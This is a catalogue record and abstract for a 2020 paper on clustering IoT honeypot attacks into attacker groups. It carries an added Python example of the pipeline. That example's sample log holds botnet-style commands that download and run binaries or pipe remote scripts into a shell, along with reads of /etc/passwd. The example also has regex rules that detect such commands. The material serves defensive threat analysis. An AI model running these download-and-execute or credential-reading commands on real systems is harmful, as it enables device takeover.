GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things

Joint Authors

Wu, Yixin
Zhang, Xing
Huang, Cheng
Zhou, Hongyi

Source

Security and Communication Networks

Issue

Vol. 2020, Issue 2020 (31 Dec. 2020), pp.1-14, 14 p.

Publisher

Hindawi Publishing Corporation

Publication Date

2020-12-04

Country of Publication

Egypt

No. of Pages

14

Main Subjects

Information Technology and Computer Science

Abstract EN

As Advanced Persistent Threat (APT) attacks become increasingly frequent around the world, security experts are starting to look at how to observe, predict, and mitigate the damage from them.

In the meantime, Internet of Things devices are also at risk: heavily exposed to the Internet, they are easily taken over by hacker organizations and used to launch APT attacks.

A capable attacker can compromise millions of Internet of Things devices in a short time.

Once the IoT botnet is built, attackers can use it to launch complex attacks that could damage Internet infrastructure and cause network outages.

This paper proposes GroupTracer, a framework for observing and predicting Internet of Things attacks.

GroupTracer is designed to automatically extract TTP profiles (tactics, techniques, and procedures) that describe the behavior of attackers, and to dig out the potential attacker groups behind complex attacks.

First, it captures attacks with IoT honeypots and extracts the relevant fields from their logs.

Then attack behaviors are mapped automatically to the ATT&CK framework, yielding the TTP profile of each attack.

After that, GroupTracer builds four feature groups (TTP profile, time, IP, and URL features; 18 features in total), mines potential attack groups with a hierarchical clustering algorithm, and compares the clustering results with two baseline algorithms.

As ground-truth labels are unavailable, three internal validation indexes are used to evaluate cluster quality.

Experimental results show that the proposed framework performs well at uncovering potential groups, reaching a Calinski–Harabasz index of 3416.93.

Finally, attack trees are generated for each cluster, where nodes indicate attack commands and edges represent command sequences.

These attack trees help in understanding each attack group's actions and techniques.
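The pipeline the abstract describes, as an added worked example that is not the paper's code: honeypot log lines are parsed into sessions, each command is mapped to ATT&CK technique IDs, each session becomes a feature vector in the four groups (TTP profile, time, IP, URL), the vectors are clustered with average-linkage hierarchical clustering, the partition is scored with the Calinski–Harabasz index, and an attack tree (command-sequence edges with counts) is built per cluster. Everything concrete is an assumption for illustration: the log format and log lines are constructed, the five command-to-technique rules are a stand-in for the paper's ATT&CK mapping, and the eleven features only approximate the paper's four groups (its 18 features are not listed in the abstract). Standard library only.

```python
"""Toy GroupTracer-style pipeline (added example, not the paper's code): honeypot log ->
ATT&CK TTP profile -> four feature groups -> average-linkage hierarchical clustering ->
Calinski-Harabasz index -> per-cluster attack tree. Standard library only."""
import math, re
from collections import defaultdict
from datetime import datetime
from itertools import combinations

# Constructed honeypot sessions (not real captures): "<utc ts> <source ip> <session id> <command>".
LOG = """\
2020-06-01T02:13:05Z 198.51.100.7 s1 cat /proc/cpuinfo
2020-06-01T02:13:06Z 198.51.100.7 s1 wget http://203.0.113.9/bins/arm7 -O /tmp/.x
2020-06-01T02:13:07Z 198.51.100.7 s1 chmod +x /tmp/.x
2020-06-01T02:13:08Z 198.51.100.7 s1 /tmp/.x
2020-06-01T02:40:11Z 198.51.100.21 s2 cat /proc/cpuinfo
2020-06-01T02:40:12Z 198.51.100.21 s2 wget http://203.0.113.9/bins/mips -O /tmp/.x
2020-06-01T02:40:13Z 198.51.100.21 s2 chmod +x /tmp/.x
2020-06-01T02:40:14Z 198.51.100.21 s2 /tmp/.x
2020-06-01T14:20:30Z 192.0.2.10 s3 uname -a
2020-06-01T14:21:02Z 192.0.2.10 s3 cat /etc/passwd
2020-06-01T14:21:40Z 192.0.2.10 s3 curl -s http://cdn.example.test/s.sh | sh
2020-06-01T15:05:10Z 192.0.2.55 s4 uname -a
2020-06-01T15:05:51Z 192.0.2.55 s4 cat /etc/passwd
2020-06-01T15:06:30Z 192.0.2.55 s4 curl -s http://cdn.example.test/s.sh | sh
"""

# Illustrative command-to-technique rules (this example's assumption, not the paper's mapping).
TECHNIQUE_RULES = [
    ("T1082", re.compile(r"\buname\b|/proc/cpuinfo")),    # System Information Discovery
    ("T1087.001", re.compile(r"/etc/passwd")),           # Account Discovery: Local Account
    ("T1105", re.compile(r"\b(wget|curl|tftp)\b")),      # Ingress Tool Transfer
    ("T1222", re.compile(r"\bchmod\b")),                 # File and Directory Permissions Modification
    ("T1059.004", re.compile(r"^/tmp/|\|\s*sh\b")),      # Command and Scripting Interpreter: Unix Shell
]
URL_RE = re.compile(r"https?://\S+")
IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def map_techniques(cmd):
    """ATT&CK technique IDs whose rule matches one shell command."""
    return {tid for tid, rx in TECHNIQUE_RULES if rx.search(cmd)}

def parse_sessions(log_text):
    """Group log lines by session id, keeping timestamps and command order."""
    sessions = {}
    for line in log_text.splitlines():
        ts, ip, sid, cmd = line.split(" ", 3)
        sess = sessions.setdefault(sid, {"ip": ip, "events": []})
        sess["events"].append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), cmd))
    return sessions

def session_features(sess, sessions):
    """One vector per session in four groups: TTP profile, time, source IP, URLs."""
    cmds = [c for _, c in sess["events"]]
    seen = set().union(*(map_techniques(c) for c in cmds))
    ttp = [1.0 if tid in seen else 0.0 for tid, _ in TECHNIQUE_RULES]
    first, last = sess["events"][0][0], sess["events"][-1][0]
    time_f = [(first.hour + first.minute / 60) / 24,            # start hour of day
              min((last - first).total_seconds(), 600) / 600]   # duration, capped at 10 min
    net24 = sess["ip"].rsplit(".", 1)[0]                         # share of other sessions in same /24
    peers = sum(o is not sess and o["ip"].rsplit(".", 1)[0] == net24 for o in sessions.values())
    ip_f = [peers / max(len(sessions) - 1, 1)]
    urls = [u for c in cmds for u in URL_RE.findall(c)]
    hosts = {u.split("/")[2] for u in urls}
    url_f = [min(len(urls), 3) / 3, float(any(IP_RE.fullmatch(h) for h in hosts)), min(len(hosts), 3) / 3]
    return ttp + time_f + ip_f + url_f

def agglomerative(vectors, k):
    """Average-linkage hierarchical clustering: merge the closest pair until k clusters remain."""
    clusters = [[i] for i in range(len(vectors))]
    link = lambda a, b: sum(math.dist(vectors[i], vectors[j]) for i in a for j in b) / (len(a) * len(b))
    while len(clusters) > k:
        i, j = min(combinations(range(len(clusters)), 2), key=lambda p: link(clusters[p[0]], clusters[p[1]]))
        clusters[i] += clusters.pop(j)   # j > i, so index i stays valid after the pop
    return clusters

def calinski_harabasz(vectors, clusters):
    """Internal validation index (no ground truth needed): between- over within-cluster dispersion."""
    n, k, d = len(vectors), len(clusters), len(vectors[0])
    mean = [sum(v[f] for v in vectors) / n for f in range(d)]
    between = within = 0.0
    for c in clusters:
        cen = [sum(vectors[i][f] for i in c) / len(c) for f in range(d)]
        between += len(c) * math.dist(cen, mean) ** 2
        within += sum(math.dist(vectors[i], cen) ** 2 for i in c)
    return math.inf if within == 0 else (between / (k - 1)) / (within / (n - k))

def attack_tree(sids, sessions):
    """Directed edges cmd_i -> cmd_i+1 with counts; URLs are abstracted so sessions overlap."""
    edges = defaultdict(int)
    for sid in sids:
        cmds = [URL_RE.sub("<url>", c) for _, c in sessions[sid]["events"]]
        for src, dst in zip(cmds, cmds[1:]):
            edges[(src, dst)] += 1
    return dict(edges)

def run(log_text, k=2):
    """Return (clusters of session ids, CH index of that partition, attack tree per cluster)."""
    sessions = parse_sessions(log_text)
    sids = list(sessions)
    vectors = [session_features(sessions[s], sessions) for s in sids]
    idx_clusters = agglomerative(vectors, k)
    clusters = [[sids[i] for i in c] for c in idx_clusters]
    return clusters, calinski_harabasz(vectors, idx_clusters), {tuple(c): attack_tree(c, sessions) for c in clusters}
```

`run(LOG)` separates the two constructed sessions that download and run an architecture-named binary from an IP-literal host (a typical IoT botnet wave) from the two that read `/etc/passwd` and pipe a script into `sh`, and the attack tree of the first cluster shows the `wget <url> -O /tmp/.x -> chmod +x /tmp/.x -> /tmp/.x` chain with a count of 2. Two caveats a practitioner should keep in mind: the Calinski–Harabasz index is a relative measure, so a value such as the paper's 3416.93 ranks partitions of the same feature matrix against each other (here, against the two baselines) and is not comparable across datasets or feature scalings; and keyword rules like the ones above are brittle against obfuscated commands (for instance a base64-decoded payload piped into a shell), so a production mapping needs a much larger, curated table and normalisation before matching.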

American Psychological Association (APA)

Wu, Yixin& Huang, Cheng& Zhang, Xing& Zhou, Hongyi. 2020. GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things. Security and Communication Networks, Vol. 2020, no. 2020, pp.1-14.
https://search.emarefa.net/detail/BIM-1208698

Modern Language Association (MLA)

Wu, Yixin…[et al.]. GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things. Security and Communication Networks No. 2020 (2020), pp.1-14.
https://search.emarefa.net/detail/BIM-1208698

American Medical Association (AMA)

Wu, Yixin& Huang, Cheng& Zhang, Xing& Zhou, Hongyi. GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things. Security and Communication Networks. 2020. Vol. 2020, no. 2020, pp.1-14.
https://search.emarefa.net/detail/BIM-1208698

Data Type

Journal Articles

Language

English

Notes

Includes bibliographical references

Record ID

BIM-1208698